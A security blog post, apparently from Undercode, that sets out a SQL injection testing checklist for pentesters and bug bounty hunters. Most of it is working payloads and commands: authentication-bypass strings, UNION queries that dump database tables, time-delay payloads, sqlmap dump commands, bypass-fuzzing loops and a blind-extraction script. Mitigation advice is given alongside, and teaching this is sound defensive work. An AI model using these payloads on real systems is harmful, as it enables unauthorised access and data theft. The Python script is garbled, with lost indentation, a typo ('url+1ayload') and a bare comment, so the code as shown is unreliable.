Listen to this Post
Introduction:
SQL injection (SQLi) remains the top critical vulnerability in OWASP Top 10, allowing attackers to bypass authentication, exfiltrate databases, and compromise entire web applications. This checklist transforms raw testing methodologies into actionable, step-by-step techniques used by professional penetration testers and bug bounty hunters on platforms like HackerOne and Bugcrowd.
Learning Objectives:
– Master seven distinct SQL injection testing methodologies from error-based to second-order attacks
– Apply manual and automated payloads across GET, POST, headers, cookies, and modern API formats (JSON/GraphQL)
– Execute practical Linux/Windows commands to detect, exploit, and mitigate SQLi vulnerabilities in real-world web applications
You Should Know:
1. Input Discovery & Parameter Mapping – The Foundation of SQLi Testing
Start by enumerating every possible injection point. Modern applications hide parameters in unexpected locations.
Step‑by‑step guide:
– GET parameters: Intercept all URL query strings, including sorting (`?sort=name`), pagination (`?page=2`), filters (`?category=books`), and hidden parameters revealed via JS files.
– POST parameters: Test login, registration, password reset, contact, and payment forms. Use Burp Suite’s “Discover Content” or `ffuf` to brute‑force parameter names.
– HTTP headers & cookies: Inject into `User-Agent`, `Referer`, `X-Forwarded-For`, `X-Client-IP`, `Cookie`, and `Host`.
– Modern APIs: For JSON, add `”test”: “‘”` inside body; for GraphQL, inject into arguments like `{user(id: “1′”) {name}}`; for WebSockets, tamper messages before sending.
Linux / Windows commands:
Linux – enumerate hidden parameters with ffuf ffuf -u 'https://target.com/page?FUZZ=value' -w /usr/share/wordlists/param.txt -fs 1234 Windows PowerShell – send test payloads via Invoke-RestMethod Invoke-RestMethod -Uri "https://target.com/search?q=test'" -Method Get
Tool config (Burp Suite): Enable “Param Miner” extension to guess hidden parameters and “Logger++” to track all injected requests.
2. Error-Based SQL Injection – Exploiting Database Errors
When an application returns database errors (e.g., “You have an error in your SQL syntax”), you can directly extract information.
Step‑by‑step guide:
1. Inject a single quote `’` into any input. Observe error messages for database type (MySQL: `””`, MSSQL: `Unclosed quotation mark`, PostgreSQL: `syntax error at or near “””`).
2. Use concatenated payloads: `’ OR 1=1–` and `’ AND 1=CONVERT(int, @@version)–` (MSSQL).
3. For MySQL, extract version with: `’ AND extractvalue(1, concat(0x7e, version()))–` (requires XPath error).
4. Automate with SQLmap: `sqlmap -u “https://target.com/page?id=1” –dbms=MySQL –level=3 –risk=2`
Commands:
Manual curl to trigger error curl "https://target.com/product?id=1'" --proxy http://127.0.0.1:8080 SQLmap fingerprinting sqlmap -u "https://target.com/login" --data "user=admin&pass=test" --dbms=PostgreSQL --banner
Mitigation: Use parameterized queries (prepared statements) and disable verbose database error messages in production.
3. Boolean-Based Blind SQL Injection – Inferring Data Bit by Bit
When no errors are shown, but the page changes (content length, status code, redirects) based on true/false conditions, use boolean inference.
Step‑by‑step guide:
1. Establish a baseline: `’ AND 1=1–` (should return normal page). `’ AND 1=2–` (should return altered/empty page).
2. Extract data character by character using substring: `’ AND SUBSTRING((SELECT database()),1,1)=’a’–`.
3. For MySQL: `’ AND (SELECT ascii(substring(database(),1,1)) FROM dual) > 100–`.
4. Automate with `sqlmap –technique=B` or write a Python script with `requests` library.
Example Python script for blind boolean:
import requests
url = "https://target.com/search?q="
payload_template = "' AND (SELECT ascii(substring(database(),{},1)) FROM dual) > {}-- "
data = ""
for pos in range(1,20):
low, high = 32, 126
while low <= high:
mid = (low+high)//2
payload = payload_template.format(pos, mid)
r = requests.get(url+1ayload)
if "Welcome" in r.text: true condition
low = mid+1
else:
high = mid-1
data += chr(high)
print(data)
Windows PowerShell alternative: Use `Invoke-WebRequest` and compare response lengths.
4. Time-Based Blind SQL Injection – Delaying Responses to Infer Truth
When no visual difference exists, use database sleep functions. A time delay indicates a true condition.
Step‑by‑step guide:
1. MySQL: `’ AND SLEEP(5)–` (wait 5 seconds if true). PostgreSQL: `’ AND pg_sleep(5)–`. MSSQL: `’ WAITFOR DELAY ‘0:0:5′–`.
2. Combine with conditional logic: `’ AND IF(1=1, SLEEP(5), 0)–` (MySQL).
3. For JSON parameters: `{“user”:”admin’ AND SLEEP(5)–“}`.
4. Monitor response time using Burp Repeater’s “Render” tab or a custom script.
Linux command with `time`:
time curl -X POST "https://target.com/login" -d "user=admin' AND SLEEP(5)--&pass=anything"
SQLmap time‑based: `sqlmap -u “https://target.com/page?id=1” –technique=T –time-sec=5`
Hardening: Use query timeouts (e.g., `statement_timeout` in PostgreSQL) and Web Application Firewall (WAF) rules to detect excessive sleep patterns.
5. UNION-Based SQL Injection – Combining Queries for Data Exfiltration
UNION injections let you append a second `SELECT` to retrieve arbitrary data from other tables.
Step‑by‑step guide:
1. Enumerate column count using `ORDER BY`: `’ ORDER BY 1–`, then `ORDER BY 2–`, etc., until error occurs.
2. Find columns that accept string data: `’ UNION SELECT NULL,NULL–`; replace `NULL` with `’a’` incrementally.
3. Extract version, database, user: `’ UNION SELECT @@version, database(), user()–` (MySQL).
4. Enumerate tables: `’ UNION SELECT table_name, column_name FROM information_schema.columns–`.
5. For MSSQL, use `’ UNION SELECT name FROM sys.databases–`.
Manual payload example:
' UNION SELECT group_concat(table_name), 2 FROM information_schema.tables WHERE table_schema=database()--
Automation: SQLmap’s `–union-check` and `–union-cols` flags.
Linux one‑liner (using `sqlmap`):
sqlmap -u "https://target.com/product?id=1" --union --columns -T users -D database_name --dump
6. Authentication Bypass – Logging in Without Credentials
SQLi in login fields can completely bypass authentication.
Step‑by‑step guide:
1. Username field: `admin’–` (comment out password check). Password field: anything.
2. Universal payload: `’ OR ‘1’=’1′–` in both fields.
3. Bypass JSON login: `{“username”:{“$ne”:null},”password”:{“$ne”:null}}` (NoSQL injection, but often combined).
4. Test MFA enrollment: inject `’ OR 1=1–` into verification code fields – may skip OTP validation.
5. Password reset workflow: inject into reset token parameter (e.g., `token=123′ OR ‘1’=’1′–`) to reset any account.
Windows / Linux – automate bypass fuzzing:
Using wfuzz (Linux)
wfuzz -z file,/usr/share/seclists/Fuzzing/SQLi/auth_bypass.txt -d "user=FUZZ&pass=test" https://target.com/login
PowerShell example
$payloads = @("admin'--", "' OR '1'='1", "admin' OR 1=1--")
foreach ($p in $payloads) {
Invoke-WebRequest -Uri "https://target.com/login" -Method Post -Body "username=$p&password=x"
}
Mitigation: Always use parameterized queries for authentication; never concatenate user input into SQL. Implement account lockout and rate limiting.
7. Second-Order SQL Injection – The Stored Attack
A payload is stored safely (e.g., registration with username `admin’–`) but later used unsafely in another SQL query (e.g., password reset lookup). This bypasses naive input filters.
Step‑by‑step guide:
1. Stored input vectors: username, email, company name, shipping address, notes, profile bio.
2. Register a user with payload: `test’ OR ‘1’=’1` as the email address.
3. Trigger a vulnerable function that later queries that stored value – e.g., “Forgot password” looks up user by email: `SELECT FROM users WHERE email=’test’ OR ‘1’=’1’` – returns all users.
4. Extract data: If the app displays a list of users (admin panel), you can pivot.
5. Test with `sleep()` payloads: register `test’ AND SLEEP(5)–` and then access profile page that uses that username in a second query.
Manual test example (registration to password reset):
POST /register HTTP/1.1 ... username=attacker&email=hacker' OR SLEEP(5)--&password=pass Later, trigger password reset POST /reset ... email=hacker' OR SLEEP(5)--
Detection tool: Use `sqlmap` with `–second-order` flag pointing to the vulnerable endpoint.
Cloud hardening: Implement prepared statements globally; use stored procedure validation; audit all places where stored data is concatenated into queries.
What Undercode Say:
– Key Takeaway 1: Manual testing still outperforms automation in blind and second-order SQLi – understanding boolean/time inference gives you an edge over script‑kiddies.
– Key Takeaway 2: Modern APIs (GraphQL, JSON, WebSockets) are often overlooked; always expand your input discovery beyond classic GET/POST to uncover critical vulnerabilities.
Analysis (10 lines): The checklist bridges the gap between theory and practice by categorizing SQLi into distinct testable patterns. Error‑based remains the fastest win, but blind techniques are where real skill shines – especially with time‑based delays that evade WAFs. Authentication bypass via SQLi continues to plague enterprises because developers trust front‑end validation. Second‑order attacks are the most devastating because they survive sanitization attempts; they require deep understanding of application workflows. The rise of headless APIs and microservices introduces new injection surfaces (e.g., `X-Forwarded-For` logged and later queried). Linux/Windows commands provided enable testers to script reconnaissance without heavy tools. Future SQLi mitigation will pivot toward AI‑driven anomaly detection, but as long as legacy code uses dynamic queries, the vulnerability persists. Bug bounty hunters who master this checklist will consistently find high‑severity reports, especially on HackerOne’s VDP programs. Ultimately, the best defense is developer education and mandatory parameterized queries in CI/CD pipelines.
Prediction:
– +1 Enterprises will increasingly adopt ORM frameworks with built‑in query parameterization, reducing classic SQLi by 60% by 2027.
– -1 Legacy internal applications and IoT backends will remain vulnerable, with second‑order SQLi becoming the 1 attack vector in hybrid cloud environments.
– +1 AI‑powered WAFs using LLMs to parse SQL semantics will emerge, but attackers will shift to time‑based payloads that mimic legitimate latency.
– -1 The rise of GraphQL and serverless databases (e.g., DynamoDB) introduces new injection dialects; most security scanners lack coverage, creating a “blind spot” for bug bounty hunters to exploit for the next 2‑3 years.
▶️ Related Video (80% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
[Join Undercode Academy for Verified Certifications](https://undercode.co.uk/certifications/)
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[[email protected]](mailto:[email protected])
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: [Deepmarketer Sql](https://www.linkedin.com/posts/deepmarketer_sql-injection-testing-checklist-ugcPost-7469197411542814721-Zw1u/) – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
[💬 Whatsapp](https://undercode.help/whatsapp) | [💬 Telegram](https://t.me/UndercodeCommunity)
📢 Follow UndercodeTesting & Stay Tuned:
[𝕏 formerly Twitter 🐦](https://x.com/undercodeupdate) | [@ Threads](https://www.threads.net/@undercodetesting) | [🔗 Linkedin](https://www.linkedin.com/company/undercodetesting/) | [🦋BlueSky](https://bsky.app/profile/undercode.bsky.social)
